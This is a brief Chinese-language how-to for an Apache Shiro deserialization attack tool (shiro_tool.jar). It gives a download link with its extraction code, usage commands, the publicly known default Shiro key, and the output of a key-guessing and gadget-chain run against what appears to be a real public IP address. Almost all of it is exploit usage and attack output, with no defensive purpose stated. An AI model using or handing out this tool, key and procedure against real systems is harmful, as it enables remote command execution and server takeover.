检测工具

https://pan.baidu.com/s/1qCpm_E_Gw1VqSwkNyaWhEw udwt

检测命令

检测是否使用shiro：java -cp shiro_tool.jar shiro.Check http://url

java -jar shiro_tool.jar https://xx.xx.xx.xx nocheck --> skip check target is shiro or not. key= --> set a shiro key. req= --> request body file 抓包保存到文件里，这里写文件名 keys= --> keys file 自定义key的文件，key按行分割，即每行写一个

(存在默认密钥：kPH+bIxk5D2deZiIxcaaaA==攻击者可利用漏洞远程执行任意命令入侵服务器) java -jar shiro_tool.jar https://xx.xx.xx.xx [-] target: http://47.110.35.164:8080 [-] target is use shiro [-] start guess shiro key... [-] use shiro key: kPH+bIxk5D2deZiIxcaaaA== [-] check CommonsBeanutils1 [-] check CommonsCollections1 [-] check CommonsCollections2 [-] check CommonsCollections3 [-] check CommonsCollections4 [-] check CommonsCollections5 [-] check CommonsCollections6 [-] check CommonsCollections7 [-] check CommonsCollections8 [-] check CommonsCollections9 [-] check CommonsCollections10 [-] check Groovy1 [-] check JSON1